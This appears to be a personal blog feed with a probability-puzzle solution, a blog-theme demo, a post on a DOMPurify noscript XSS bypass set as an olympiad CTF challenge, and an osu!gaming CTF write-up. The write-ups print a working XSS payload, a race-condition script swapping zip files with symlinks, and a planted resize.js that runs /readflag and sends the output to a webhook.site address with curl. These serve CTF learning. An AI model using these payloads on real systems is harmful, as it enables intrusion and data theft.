        Q_cache[key] = res
        return res

Now, all we need to do is find this p that minimizes q.
Lets plot a graph of q as p progresses.

import matplotlib.pyplot as plt
x_vals = []
y_vals = []
for i in range(1,101):
    V_cache = {}
    Q_cache = {}
    x_vals.append(i/100)
    y_vals.append(Q(3,2,i/100))

plt.xlabel("p value")
plt.ylabel("Q(3,2,p)")
plt.plot(x_vals, y_vals)
plt.show()

As you can see, the value of Q peaks somewhere around $p=0.22$
We could then bruteforce all values to 10dp between 0.2-0.25(one of my friends wrote this script in c++ and did this)
However, it would probably be faster and more bearable to use some sort of optimised search function given that our code is not terribly fast, and 10dp isn't that hard to narrow down.

Thankfully, scipy has a pretty good minimize_scalar function. Since we want to maximise Q instead of minimizing it, we could just aim to minimize -Q or (1-Q)

from scipy.optimize import minimize_scalar
def compute_q(p):
    V_cache.clear()
    Q_cache.clear()
    return -Q(3,2,p)
res = minimize_scalar(
    lambda p: compute_q(p),
    bounds=(0,1),
    method='bounded',
    options= {
        'disp': True
    }
)

print("Optimal p:", f"{res.x:.10f}", "Resultant Q = ", f"{Q(3,2,res.x):.10f}") # 0.2269743428955392

Optimal p: 0.2269743429 Resultant Q = 0.2959679933

And that's the puzzle solved! :laughing:

Showing Off Blog Features

kek — Sun, 20 Jul 2025 00:00:00 GMT

Since the post does not have a description in the frontmatter, the first paragraph is used.

Theming

Use your favorite editor theme for your blog!

Theming for the website comes from builtin Shiki themes found in Expressive Code. You can view them here. A website can have one or more themes, defined in src/site.config.ts. There are three theming modes to choose from:

single: Choose a single theme for the website. Simple.
light-dark-auto: Choose two themes for the website to use for light and dark mode. The header will include a button for toggling between light/dark/auto. For example, you could choose github-dark and github-light with a default of "auto" and the user's experience will match their operating system theme straight away.
select: Choose two or more themes for the website and include a button in the header to change between any of these themes. You could include as many Shiki themes from Expressive Code as you like. Allow users to find their favorite theme!

When the user changes the theme, their preference is stored in localStorage to persist across page navigation.

Code Blocks

Let's look at some code block styles:

def hello_world():
    print("Hello, world!")

hello_world()

def hello_world():
    print("Hello, world!")

hello_world()

python hello.py

Also some inline code: 1 + 2 = 3. Or maybe even (= (+ 1 2) 3).

See the Expressive Code Docs for more information on available features like wrapping text, line highlighting, diffs, etc.

Basic Markdown Elements

List item 1
List item 2

Bold text

Italic text

~~Strikethrough text~~

Link

In life, as in art, some endings are bittersweet. Especially when it comes to love. Sometimes fate throws two lovers together only to rip them apart. Sometimes the hero finally makes the right choice but the timing is all wrong. And, as they say, timing is everything.

- Gossip Girl

Name	Age	City
Alice	30	New York
Bob	25	Los Angeles
Charlie	35	Chicago

Images

Images can include a title string after the URL to render as a <figure> with a <figcaption>.

![Pixel art of a tree](https://upload.wikimedia.org/wikipedia/commons/9/90/PixelatedGreenTreeSide.png "Pixel art renders poorly without proper CSS")

I've also added a special tag for pixel art that adds the correct CSS to render properly. Just add #pixelated to the URL.

![Pixel art of a tree](https://upload.wikimedia.org/wikipedia/commons/9/90/PixelatedGreenTreeSide.png#pixelated "But adding #pixelated fixes this")

Admonitions

:::note
testing123
:::

:::note testing123 :::

:::tip testing123 :::

:::important testing123 :::

:::caution testing123 :::

:::warning testing123 :::

HTML Elements

<button>A Button</button>

Fieldset with Inputs

<fieldset> <input type="text" placeholder="Type something"><br> <input type="number" placeholder="Insert number"><br> <input type="text" value="Input value"><br> <select> <option value="1">Option 1</option> <option value="2">Option 2</option> <option value="3">Option 3</option> </select><br> <textarea placeholder="Insert a comment..."></textarea><br> <label><input type="checkbox"> I understand<br></label> <button type="submi">Submit</button> </fieldset>

Form with Labels

<form> <label> <input type="radio" name="fruit" value="apple"> Apple </label><br>

<label> <input type="radio" name="fruit" value="banana"> Banana </label><br>

<label> <input type="radio" name="fruit" value="orange"> Orange </label><br>

<label> <input type="radio" name="fruit" value="grape"> Grape </label><br>

<label> <input type="checkbox" name="terms" value="agree"> I agree to the terms and conditions </label><br>

How I accidentally set a DOMPurify 0 day as a national high school olympiad qualification challenge

kek — Fri, 10 Apr 2026 00:00:00 GMT

The Singapore National Cybersecurity Olympiad preliminary round has recently just concluded.

For the contest, I set 2 web challenges. Here's how I accidentally set a 0 day DOMPurify vulnerability as a challenge.

The Challenge

Not sure if I can share the entire source, but the challenge revolves around this code snippet

const clean = DOMPurify.sanitize(content);

res.send("<div><noscript>"+clean+"</noscript></div>")

Disclaimer: I found this behaviour somewhere around November of 2025, and assumed it was intended behavior, and that the exploitability of this stemmed from the misuse of dompurify (lack of context) rather than an actual vulnerability. Therefore, I did not report this vulnerability at that point in time (trust me, I would've collected that CVE if I thought it could've been one). I only realised this was intended behaviour after the contest when I was notified of the CVE that had been released 2 days before the contest.

Oops...

Anyways, fast forward to the day of the contest when I received this message from the other web author - @halogen

At this time, I was busy playing poker at a friend's place. Quickly however, I whipped out my laptop to check if I had indeed committed a whoopsie :p

After updating dompurify and spinning up the challenge...yep, it seemed like the latest dompurify patch fixed my challenge. Thankfully, the docker image we were deploying at that time still had the outdated dompurify version!

Therefore, I didn't think much of it until later.

Preliminary investigations

The CVE in question is CVE-2026-0540, a vulnerability in the sanitizer caused by a lack of rawtext elements in the SAFE_FOR_XML regex.

Before we go further, let me show you my intended solution to the challenge:

<div id="</noscript><img src=x onerror=eval(atob(''))>"></div>

Now let us try to see why this works

noscript...or yesscript?

noscript is a HTML tag that defines alternate content to be displayed when the user's browser has javascript disabled. The way the browser handles this is by treating content starting from a <noscript> tag as literal raw text data till it hits another </noscript> tag. (in my personal opinion, the name "noscript" is extremely misleading to beginner developers who might use it as an XSS prevention, but webdev might be dead to claude anyways so...).

Actual analysis

Here's how the bug actually worked.

DOMPurify mistakingly assumes that attribute boundaries are preserved across different HTML context.
What does one mean by this? Well, essentially DOMPurify assumes that things within an attribute stay within an attribute which is really really really not the case. For elements like noscript, xmp, iframe, noembed and noframes.

The HTML tokenizer treats these contexts differently as explained above depending on what the context is. Consider this snippet

<div kek="</noscript>">hehe</div>

This is perfectly fine behaviour. The attribute "kek" has the value of "</noscript>". There were no opening noscript tags and therefore the HTML parser does not register a noscript context.

Now consider this snippet

<noscript><div kek="</noscript>normal_html">hehe</div>

Now this is a very different scenario. The HTML tokenizer sees the opening <noscript> tags and proceeds to treat everything after it as raw text. Therefore, <div kek=" becomes raw text. Then, it sees a </noscript> closing tag and exits out of the noscript context. Therefore, everything after this (normal_html) is parsed as, well, normal HTML.

Here is the code snippet responsible

 /* Work around a security issue with comments inside attributes */
if (
    SAFE_FOR_XML &&
    regExpTest(/((--!?|])>)|<\/(style|title|textarea)/i, value)
  ) {
    _removeAttribute(name, currentNode);
    continue;
  }

Interestingly enough, you can see remnants of a patch of (what I presume) was another XSS vulnerability involving HTML comments! This is a good example of why looking at past commits can be so insanely valuable in finding new bugs.

Anyhoo, the attribute guard fails to check for the noscript tags. The patch is as follows

if (SAFE_FOR_XML && regExpTest(/((--!?|])>)|<\/(style|title|xmp|textarea|noscript|iframe|noembed|noframes)/i, value)) {

As you can see, the proper checks are now in place.

Visualization of what happens

So what actually happens in this challenge?

Well, the challenge involves concatenating a sanitized snippet into a noscript context

res.send("<div><noscript>"+clean+"</noscript></div>")

Consider the intended payload <div id="</noscript><img src=x onerror=eval(atob(''))>"></div>.

When this gets injected into the response, it becomes

<div><noscript><div id="</noscript><img src=x onerror=eval(atob(''))>"></div></noscript></div>

See what happens? We escape out of the initial noscript. The DOM looks like this

<div>
  <noscript><div id="</noscript>
  <img src=x onerror=eval(atob(''))>">
</div>
</noscript>
</div>

Our img tag is rendered fully and therefore we achieve XSS! Delicious...

In defense of myself + extra vibecoding thoughts

Now you may ask: if you found this all the way back in November why did you not report it? My defense is that I did not actually realise this was a vulnerability at all. I assumed that this was intended behaviour of DOMPurify and that this would be classified as "unintended usage due to lack of context given to DOMPurify (a known issue)" had I reported it.

I do not believe that using DOMPurify this way is smart.

Also it was probably 2am when I found this bug :p

RIP my CVE I guess...

Anyways, an interesting note is that this challenge was created around how vibecoding could introduce vulnerabilities to your code. The context was a webapp that was 100% vibecoded. Initially, I had prompted claude to "create a webapp for my ctf chall etc...don't introduce the vulnerability yet, I'll do this myself". Surprisingly, it actually wrote the challenge (including the vulnerable code!) with a comment that said '# Safe sanitization code for now, the user will introduce the vulnerability later'

Perhaps this should've told me that this was an actual vulnerability but I guess I was just too oblivious.

Conclusion

Anyhow, I hope you enjoyed this small analysis of the CVE. Hopefully I actually report bugs I find next time (or maybe not).

osu!gaming CTF 2025 - Chart Viewer (Web)

kek — Thu, 06 Nov 2025 00:00:00 GMT

Introduction

I recently played the osu!gaming CTF with slight_smile and we managed to clinch 3rd!
Solved a challenge that was really similar to another race condition challenge I wrote for Sieberrsec CTF - S.K.I.B.I.D.I, just with a more obvious entry point for the race condition

I love looking at those chart background...
expected difficulty: 3/5
Author: chara
Solves: 14
Attachments: web_chart-viewer.tar.gz

Recon

Initial recon of this challenge is pretty simple due to the source being provided as unobfuscated javascript.

We see index.js, flag.txt, and readflag.c. Additionally, the challenge is instanced.
Immediately, this tells me that we probably have to achieve rce/at least be able to execute a binary somehow to execute readflag and then pipe the output of that binary somewhere.

Lets take a look at Dockerfile

FROM gcc:latest AS build-readflag
COPY readflag.c /readflag.c
RUN gcc /readflag.c -o /readflag && \
    chown root:root /readflag && chmod 4755 /readflag

FROM node:latest

COPY --from=build-readflag /readflag /readflag
RUN chown root:root /readflag && chmod 4755 /readflag

COPY --chown=root:root flag.txt /flag.txt
RUN chmod 400 /flag.txt

# install 7z and unzip
RUN apt-get update && apt-get install -y p7zip-full unzip

RUN useradd -m app
USER app

WORKDIR /app
COPY package.json ./
RUN npm install
COPY public ./public
COPY index.js ./

ENTRYPOINT [ "node", "index.js" ]

Our suspicions are confirmed! As we can see, on build, the readflag.c script is built and the resultant binary is chwon'ed to root and placed in the root directory /. Thereafter, the flag is also placed in root and chown'ed to root.
Unzip and p7zip-full and installed for some reason and then the webserver is setup and ran as the "app" user.
Therefore, even if we achieve an arb file read/write, we are unable to read the flag.txt file and have to find some way to call the /readflag binary.

Next, lets take a look a readflag.c

/* readflag.c — minimal SUID reader (safer than system()) */
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <errno.h>
#include <stdio.h>

int main(void) {
    if (setuid(0) != 0) {
        _exit(1);
    }

    /* setgroups(0, NULL); */ /* uncomment if desired and permitted */

    int fd = open("/flag.txt", O_RDONLY | O_CLOEXEC);
    if (fd < 0) _exit(2);

    /* Read and write loop */
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof(buf))) > 0) {
        ssize_t w = 0;
        while (w < n) {
            ssize_t s = write(1, buf + w, n - w);
            if (s <= 0) _exit(3);
            w += s;
        }
    }
    close(fd);
    _exit(0);
}

This is pretty simple, it just reads /flag.txt and pipes the output to stdout. Nothing too fancy here

Now, onto the meat and potatoes of this challenge - index.js

There are quite a few functions that look potentially interesting, let's take a look at them

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024; // 2 MB

const UPLOAD_DIR = '/tmp/uploads';
if (!fs.existsSync(UPLOAD_DIR)) fs.mkdirSync(UPLOAD_DIR, { recursive: true });

const storage = multer.diskStorage({
  destination: (req, file, cb) => cb(null, UPLOAD_DIR),
  filename: (req, file, cb) => cb(null, req.body.name || file.originalname)
});

const fileFilter = (req, file, cb) => {
  const name = req.body.name || file.originalname;
  if (name.includes('..') || name.includes('/') || name.includes('\\')) {
    return cb(null, false);
  }
  cb(null, true);
};
const upload = multer({ storage, fileFilter });

Here, the webserver defines MAX_UPLOAD_BYTES, which is likely the maximum size of any file we are allowed to upload in the future. 2MB is rather large so we ought not to be worried here. Furthermore, this tells us that we likely don't need to upload large files in an attempt to lag the filesystem.
Next, UPLOAD_DIR is set to /tmp/uploads - likely where our uploaded files are stored.

We can see that multer is configured with diskStorage to UPLOAD_DIR, confirming our suspicions.

Lastly, fileFilter filters all '..' and '/' and '' from the filename, almost definitively preventing naive path traversal.

app.post('/upload', upload.single('file'), (req, res) => {
  if (!req.file) return res.status(400).send('no file uploaded, check filename');
  if (req.file.filename.includes('..') || req.file.filename.includes('/')) {
    return res.status(400).send('invalid filename');
  }
  res.send(`${req.file.filename}`);
});

The upload endpoint is pretty basic. We just need to provide a filename, and it checks if the filename includes '..' or '/'. Interestingly enough, the if loop where it returns "invalid filename" doesn't actually check for ''. Thought that was pretty interesting at first but it leads to nowhere in the end.
With this, we have a file upload to anywhere in /tmp/uploads


app.get('/process', async (req, res) => {
  const name = req.query.name;
  const entryName = req.query.file;
  const startTime = Date.now(); 
  if (!name || !entryName) return res.status(400).send('missing params');
  if (name.includes('..') || name.includes('/') || name.length > 1) {
    // I made some errors here - but still should be solvable :clueless:
    return res.status(400).send('bad zip name');
  }

  const zipPath = path.join(UPLOAD_DIR, `${name}`);
  try {
    const zip = new StreamZip.async({ file: zipPath });
    const entries = await zip.entries();
    for (const [ename, entry] of Object.entries(entries)) {
      const archiveEntryName = ename;

      const unixStyle = String(archiveEntryName).replace(/\\/g, '/');
      if (unixStyle.includes('\0') || /[\x00-\x1f]/.test(unixStyle)) {  
        await zip.close();
        console.log('Bad zip entry (null/control bytes):', archiveEntryName);
        return res.status(400).send('bad zip entry (invalid chars)');
      }
      const normalized = path.posix.normalize(unixStyle);

      if (
        normalized === '' ||
        normalized.startsWith('/') ||
        /^[a-zA-Z]:\//.test(unixStyle) ||
        normalized.split('/').some(seg => seg === '..')
      ) {
        await zip.close();
        console.log('Found path traversal entry:', archiveEntryName);
        return res.status(400).send('bad zip entry (path traversal)');
      }

      const attr = entry && entry.attr ? entry.attr : 0;
      const looksLikeSymlink = (((attr >> 16) & 0xFFFF) & 0o170000) === 0o120000;
      if (looksLikeSymlink) {
        await zip.close();
        console.log('Found symlink via external attributes:', archiveEntryName);
        return res.status(400).send('symlinks not allowed (detected)');
      }

    }
    await zip.close();
  } catch (err) {
    console.log(err);
    return res.status(500).send('check error');
  }
  try {
    if (entryName.includes('..') || entryName.includes('/')) {
      return res.status(400).send('bad entry name');
    }
    const extractDir = path.join(UPLOAD_DIR, `${name}_extracted`);

    if (!fs.existsSync(extractDir)) fs.mkdirSync(extractDir);

      await new Promise(resolve => setTimeout(() => { fs.copyFileSync(zipPath, path.join(extractDir, path.basename(zipPath))); resolve(); }, 1000));
      const unzipResult = spawnSync('unzip', ['-o', path.join(extractDir, path.basename(zipPath))], { cwd: extractDir, timeout: 10000 });
    if (unzipResult.status !== 0) {
      console.log(`Unzip error: ${unzipResult.stderr.toString()}, ${unzipResult.status}`);
      return res.status(500).send('unzip error');
    }

    const entryPath = path.join(extractDir, path.basename(`${entryName}`));
    const contents = fs.readFileSync(entryPath, 'utf8');
    console.log(`Reading entry from path: ${entryPath}`);

    if (!fs.existsSync(entryPath)) {
      return res.status(404).send('entry not found (second check)');
    }
    fs.readFile(entryPath, 'utf8', (err, data) => {
      if (err) return console.error(err);
    });

    if (!entryPath.endsWith('.jpg') && entryName.length > 1) { // if entryName.length = 1 you can read anything
      return res.status(400).send('only .jpg files allowed');
    }

    if (!contents) return res.status(404).send('entry not found');
    return res.type('text/plain').send(contents);
  } catch (err) {
    console.log(err);
    return res.status(500).send('read error');
  }
});

This is the meat of the challenge. In essence, the /process endpoint allows us to specify a single character filename. Afterwhich, it opens /tmp/uploads/<filename> as a zipfile, does some path normalization, checks for '/' in record names (to prevent path traversal).
If the zip file passes all these checks, it creates a folder /tmp/uploads/<filename>_extracted (if it doesn't already exist), waits for 1 second, copies /tmp/uploads/<filename> over to /tmp/uploads/<filename>_extracted and unzips the file with the unzip command with a timeout of 10 seconds.

Lastly, it attempts to read req.query.file (that cannot contain / or ..) with !entryPath.endsWith('.jpg') && entryName.length > 1 this check and returns the contents of the file.

Thought Process

A few things stand out immediately.

The folder name in which it stores the extracted files is deterministic. Furthermore, the folder's contents aren't destroyed. This means that we can call the process endpoint multiple times with the same zipfile and the contents of each zipfile will simply be dumped there without fail.
It waits for a full second before copying the zip file over. This is a classic redflag for CTF challenges that tell you with almost 100% certainty that a race condition is involved somewhere
It uses the unzip command. The unzip command overwrites files indiscriminately, and will remove path segments like '..' and prefixed '/'. This is secure given that you unzip the file in an empty folder. Therefore, the checks for path traversal actually don't do anything
Zips can contain symlinks. This is a very common quirk of zip files/archive formats that many ctf challenges use (and can also appear pretty commonly in real life!)
P7zip-full is installed for some reason but never used (spoiler: this is irrevelant to the challenge but I spent quite some time down this rabbit hole :angry:)

Race condition vulnerabilities where some variable is checked against some condition, then used after are called TOCTOU(Time Of Check, Time Of Use) vulnerabilities.
However, I personally never found an appeal for this acronym.
Liveoverflow has a pretty nice video explaining this class of vulnerabilities on his channel here
Or maybe I'm just a liveoverflow simp...

Anyhow, the first thing that came to my mind was that we could swap out the zipfiles before the file was copied over, but after the check was done.

This is made possible by the fact that the upload function rewrites old files, plus the fact that there is a whole second after the check but before the copy.

Therefore I wrote this script

import requests


# B contains the symlink, A contains the file,C will contain the
url = "https://chart-viewer-2234294574f3.instancer.sekai.team"

r = requests.post(url + '/upload', files = {'file': ('A', open('A', 'rb'))}, data = {'name': 'A'})


print(r.text)
print('Uploaded A')


import threading
import time


def send_file(files, data):
    time.sleep(0.2)
    print('files:', files)
    print('data:', data)
    r = requests.post(url + '/upload', files=files, data=data)
    print(r.text)


def send_process(data):
    print(data)
    r = requests.get(url + '/process', params=data)
    print(r.text)

thread1 = threading.Thread(target=send_file, args=({'file': ('A', open('zips/A', 'rb'))}, {'name': 'A'}))
thread2 = threading.Thread(target=send_process, args=({'name': 'A', 'file': 'faketmp'},))


thread1.start()
thread2.start()

thread1.join()  #  Wait for completion
thread2.join()

print("Both requests completed, uploaded symlink")

This will upload 'A', call /process, and 0.2s later upload another file of my choosing with name 'A'.

This allows us to bypass the huge chunk of checks.

Hurrah! We can now solve the challenge...right? Simply upload a zip containing something like test.jpg, then swap it out with a zip that contains a symlink to /flag.txt.

This is where we hit our first roadblock. We cannot simply read /flag.txt as it is owned by root. Furthermore, the unzip utility strips all '..' and ignore's prefixed '/'s. Therefore, we are only limited extracting only to our current directory (and subdirectories).

At this juncture, my initial instinct was that p7zip-full had to be installed for some reason. Perhaps unzip had a lesser known feature that called p7zip whenever it saw a 7z archive?
I then spent the next 30min crawling through the unzip documentation and experimenting around with it in hopes of finding such behavior with no luck.
I'm 99% sure the author installed p7zip-full just to toy with our feelings :shrug:

After some mulling around spinning in my chair, I realised that by swapping in the zip files, we could upload folders that were symlinks to other folders!
That is, we could craft a zip file, 'A', with the following structure

helloworld -> /app

Then, we can extract this zip which leaves us with
/tmp/uploads/A_extracted/helloworld -> /app

Afterwhich, we craft another zipfile, 'A' with the following structure

hellworld/dangerous_looking_payload.js

Which when unzipped, will cause unzip to extract dangerous_looking_payload.js to /tmp/uploads/A_extracted/helloworld, which leads to dangerous_looking_payload.js being extracted to app.js

With this, we have an arbitrary write on the whole filesystem and the challenge should be trivial after this.

Here's a helpful infographic I drew on mspaint :laugh:

Now what file can we overwrite to get RCE? Conveniently, there seems to be another function in index.js, /render

app.post('/render', (req, res) => {
  const sharp = require('sharp');

  const contentLength = parseInt(req.headers['content-length'] || '0', 10);
  if (contentLength && contentLength > MAX_UPLOAD_BYTES) return res.status(413).send('file too large');

  let bytes = 0;
  let aborted = false;
  req.on('data', c => {
    bytes += c.length;
    if (bytes > MAX_UPLOAD_BYTES && !aborted) {
      aborted = true;
      req.destroy();
      try { res.status(413).send('file too large'); } catch (e) { }
    }
  });

  const transformer = sharp({ failOnError: true })
    .ensureAlpha()
    .removeAlpha()
    .resize(16, 1, { fit: 'fill' });

  req.pipe(transformer);

  transformer
    .raw()
    .toBuffer({ resolveWithObject: true })
    .then(({ data, info }) => {
      if (aborted) return;
      if (!info || info.channels < 3) return res.status(400).send('unsupported image');

      const channels = info.channels;
      const sampled = [];
      for (let x = 0; x < info.width; x++) {
        const idx = x * channels;
        const r = data[idx];
        const g = data[idx + 1];
        const b = data[idx + 2];
        sampled.push(rgbToHex(r, g, b));
      }
      return res.json({
        controlColors: sampled,
      });
    })
    .catch(err => {
      if (!res.headersSent) {
        console.error('render error', err && err.message ? err.message : err);
        res.status(400).send('image processing error');
      }
      try { transformer.destroy(); } catch (e) { }
      try { req.destroy(); } catch (e) { }
    });

  req.on('close', () => {
    try { transformer.destroy(); } catch (e) { }
  });
});

function rgbToHex(r, g, b) {
  return '#' + [r, g, b].map(v => (v & 0xff).toString(16).padStart(2, '0')).join('');
}

It is interesting that the sharp library is only imported upon the first call of /render.
Some digging into the sharp library tells me that it is used for "High performance Node.js image processing"

That seemed like a promising candidate to overwrite files to, as we could overwrite files that would only be "imported"/stored in memory after we called /render, which is non essential to our exploit thus far.
Therefore, I did an npm install and went digging around the libraries files.

I quickly found resize.js, which stored function resize (widthOrOptions, height, options) {, which was called by .resize(16, 1, { fit: 'fill' });.

Therefore, I quickly wrote a new resize.js which looked something like this

function resize (widthOrOptions, height, options) {
  const { execSync } = require('child_process');

  // Execute /readflag and capture stdout
  let stdout = execSync('/readflag', { encoding: 'utf-8' });
  
  // Send the output via curl
  execSync(`curl -X POST -d "${stdout}" https://webhook.site/1a0b2935-9c58-4abe-9410-b00ea9d64a09`);

Which just sent the flag to my webserver.

Flagging

Thus, our exploit is complete.
I used this nifty python script to create 3 zip files

import zipfile

# Create zip file named 'A.zip'

with open('old_resize.js', 'r') as f:
    resize_js_content = f.read()
with zipfile.ZipFile('zips/A', 'w') as zf:
    # Add entry with absolute path /app/test.txt
    zf.writestr('faketmp/resize.js', resize_js_content)

print("Created A.zip with entry /app/test.txt containing 'pogchamp'")

First, we had 'A'

test.jpg

Next, we had 'A'

faketmp -> /app/node_modules/sharp/lib

Afterwhich, we had 'A'

faketmp/resize.js

Using our previous overwrite_import.py script, we could then upload each file one by one and overwrite the resize.js library.
Next, we simply call /render and win!

Testing this on local seemed to work well

And on remote, we got osu{I_w4nt_mus1c_n3xt_t1m3}

Summary

This was a decently interesting challenge(that can probably serve as a good introduction) about race conds and symlinks. 7/10